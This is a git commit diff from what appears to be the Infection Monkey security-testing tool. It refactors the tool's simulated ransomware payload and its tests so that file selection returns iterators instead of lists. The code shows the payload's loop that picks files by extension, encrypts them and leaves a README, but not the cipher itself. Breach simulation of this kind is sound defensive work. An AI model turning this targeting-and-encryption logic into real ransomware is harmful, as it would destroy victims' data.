Agent: Use iterators instead of lists for ransomware file filtering
This commit is contained in:
parent
4316329384
commit
7c6ba2e276
|
@ -1,6 +1,6 @@
|
|||
import filecmp
|
||||
from pathlib import Path
|
||||
from typing import List, Set
|
||||
from typing import Iterable, Set
|
||||
|
||||
from infection_monkey.utils.dir_utils import (
|
||||
file_extension_filter,
|
||||
|
@ -17,7 +17,7 @@ class ProductionSafeTargetFileSelector:
|
|||
def __init__(self, targeted_file_extensions: Set[str]):
|
||||
self._targeted_file_extensions = targeted_file_extensions
|
||||
|
||||
def __call__(self, target_dir: Path) -> List[Path]:
|
||||
def __call__(self, target_dir: Path) -> Iterable[Path]:
|
||||
file_filters = [
|
||||
file_extension_filter(self._targeted_file_extensions),
|
||||
is_not_shortcut_filter,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import logging
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from typing import Callable, List
|
||||
from typing import Callable, Iterable
|
||||
|
||||
from infection_monkey.telemetry.file_encryption_telem import FileEncryptionTelem
|
||||
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
||||
|
@ -18,7 +18,7 @@ class Ransomware:
|
|||
self,
|
||||
config: RansomwareOptions,
|
||||
encrypt_file: Callable[[Path], None],
|
||||
select_files: Callable[[Path], List[Path]],
|
||||
select_files: Callable[[Path], Iterable[Path]],
|
||||
leave_readme: Callable[[Path, Path], None],
|
||||
telemetry_messenger: ITelemetryMessenger,
|
||||
):
|
||||
|
@ -31,7 +31,9 @@ class Ransomware:
|
|||
|
||||
self._target_directory = self._config.target_directory
|
||||
self._readme_file_path = (
|
||||
self._target_directory / README_FILE_NAME if self._target_directory else None
|
||||
self._target_directory / README_FILE_NAME # type: ignore
|
||||
if self._target_directory
|
||||
else None
|
||||
)
|
||||
|
||||
def run(self, interrupt: threading.Event):
|
||||
|
@ -41,23 +43,23 @@ class Ransomware:
|
|||
logger.info("Running ransomware payload")
|
||||
|
||||
if self._config.encryption_enabled:
|
||||
file_list = self._find_files()
|
||||
self._encrypt_files(file_list, interrupt)
|
||||
files_to_encrypt = self._find_files()
|
||||
self._encrypt_files(files_to_encrypt, interrupt)
|
||||
|
||||
if self._config.readme_enabled:
|
||||
self._leave_readme_in_target_directory(interrupt)
|
||||
|
||||
def _find_files(self) -> List[Path]:
|
||||
def _find_files(self) -> Iterable[Path]:
|
||||
logger.info(f"Collecting files in {self._target_directory}")
|
||||
return sorted(self._select_files(self._target_directory))
|
||||
return self._select_files(self._target_directory) # type: ignore
|
||||
|
||||
def _encrypt_files(self, file_list: List[Path], interrupt: threading.Event):
|
||||
def _encrypt_files(self, files_to_encrypt: Iterable[Path], interrupt: threading.Event):
|
||||
logger.info(f"Encrypting files in {self._target_directory}")
|
||||
|
||||
interrupted_message = (
|
||||
"Received a stop signal, skipping remaining files for encryption of ransomware payload"
|
||||
)
|
||||
for filepath in interruptible_iter(file_list, interrupt, interrupted_message):
|
||||
for filepath in interruptible_iter(files_to_encrypt, interrupt, interrupted_message):
|
||||
try:
|
||||
logger.debug(f"Encrypting {filepath}")
|
||||
self._encrypt_file(filepath)
|
||||
|
@ -76,6 +78,6 @@ class Ransomware:
|
|||
return
|
||||
|
||||
try:
|
||||
self._leave_readme(README_SRC, self._readme_file_path)
|
||||
self._leave_readme(README_SRC, self._readme_file_path) # type: ignore
|
||||
except Exception as ex:
|
||||
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
|
||||
|
|
|
@ -1,17 +1,17 @@
|
|||
from pathlib import Path
|
||||
from typing import Callable, Iterable, List, Set
|
||||
from typing import Callable, Iterable, Set
|
||||
|
||||
|
||||
def get_all_regular_files_in_directory(dir_path: Path) -> List[Path]:
|
||||
def get_all_regular_files_in_directory(dir_path: Path) -> Iterable[Path]:
|
||||
return filter_files(dir_path.iterdir(), [lambda f: f.is_file()])
|
||||
|
||||
|
||||
def filter_files(
|
||||
files: Iterable[Path], file_filters: Iterable[Callable[[Path], bool]]
|
||||
) -> List[Path]:
|
||||
) -> Iterable[Path]:
|
||||
filtered_files = files
|
||||
for file_filter in file_filters:
|
||||
filtered_files = [f for f in filtered_files if file_filter(f)]
|
||||
filtered_files = filter(file_filter, filtered_files)
|
||||
|
||||
return filtered_files
|
||||
|
||||
|
|
|
@ -24,7 +24,7 @@ def file_selector():
|
|||
|
||||
|
||||
def test_select_targeted_files_only(ransomware_test_data, file_selector):
|
||||
selected_files = file_selector(ransomware_test_data)
|
||||
selected_files = list(file_selector(ransomware_test_data))
|
||||
|
||||
assert len(selected_files) == 2
|
||||
assert (ransomware_test_data / ALL_ZEROS_PDF) in selected_files
|
||||
|
|
|
@ -58,10 +58,12 @@ def mock_file_encryptor():
|
|||
|
||||
@pytest.fixture
|
||||
def mock_file_selector(ransomware_test_data):
|
||||
selected_files = [
|
||||
ransomware_test_data / ALL_ZEROS_PDF,
|
||||
ransomware_test_data / TEST_KEYBOARD_TXT,
|
||||
]
|
||||
selected_files = iter(
|
||||
[
|
||||
ransomware_test_data / ALL_ZEROS_PDF,
|
||||
ransomware_test_data / TEST_KEYBOARD_TXT,
|
||||
]
|
||||
)
|
||||
return MagicMock(return_value=selected_files)
|
||||
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ def test_get_all_regular_files_in_directory__no_files(tmp_path, monkeypatch):
|
|||
add_subdirs_to_dir(tmp_path)
|
||||
|
||||
expected_return_value = []
|
||||
assert get_all_regular_files_in_directory(tmp_path) == expected_return_value
|
||||
assert list(get_all_regular_files_in_directory(tmp_path)) == expected_return_value
|
||||
|
||||
|
||||
def test_get_all_regular_files_in_directory__has_files(tmp_path, monkeypatch):
|
||||
|
@ -63,7 +63,7 @@ def test_filter_files__no_results(tmp_path):
|
|||
add_files_to_dir(tmp_path)
|
||||
|
||||
files_in_dir = get_all_regular_files_in_directory(tmp_path)
|
||||
filtered_files = filter_files(files_in_dir, [lambda _: False])
|
||||
filtered_files = list(filter_files(files_in_dir, [lambda _: False]))
|
||||
|
||||
assert len(filtered_files) == 0
|
||||
|
||||
|
@ -109,8 +109,8 @@ def test_is_not_symlink_filter(tmp_path):
|
|||
link_path = tmp_path / "symlink.test"
|
||||
link_path.symlink_to(files[0], target_is_directory=False)
|
||||
|
||||
files_in_dir = get_all_regular_files_in_directory(tmp_path)
|
||||
filtered_files = filter_files(files_in_dir, [is_not_symlink_filter])
|
||||
files_in_dir = list(get_all_regular_files_in_directory(tmp_path))
|
||||
filtered_files = list(filter_files(files_in_dir, [is_not_symlink_filter]))
|
||||
|
||||
assert link_path in files_in_dir
|
||||
assert len(filtered_files) == len(FILES)
|
||||
|
@ -121,7 +121,7 @@ def test_is_not_shortcut_filter(tmp_path):
|
|||
add_files_to_dir(tmp_path)
|
||||
|
||||
files_in_dir = get_all_regular_files_in_directory(tmp_path)
|
||||
filtered_files = filter_files(files_in_dir, [is_not_shortcut_filter])
|
||||
filtered_files = list(filter_files(files_in_dir, [is_not_shortcut_filter]))
|
||||
|
||||
assert len(filtered_files) == len(FILES) - 1
|
||||
assert SHORTCUT not in [f.name for f in filtered_files]
|
||||
|
|
Loading…
Reference in New Issue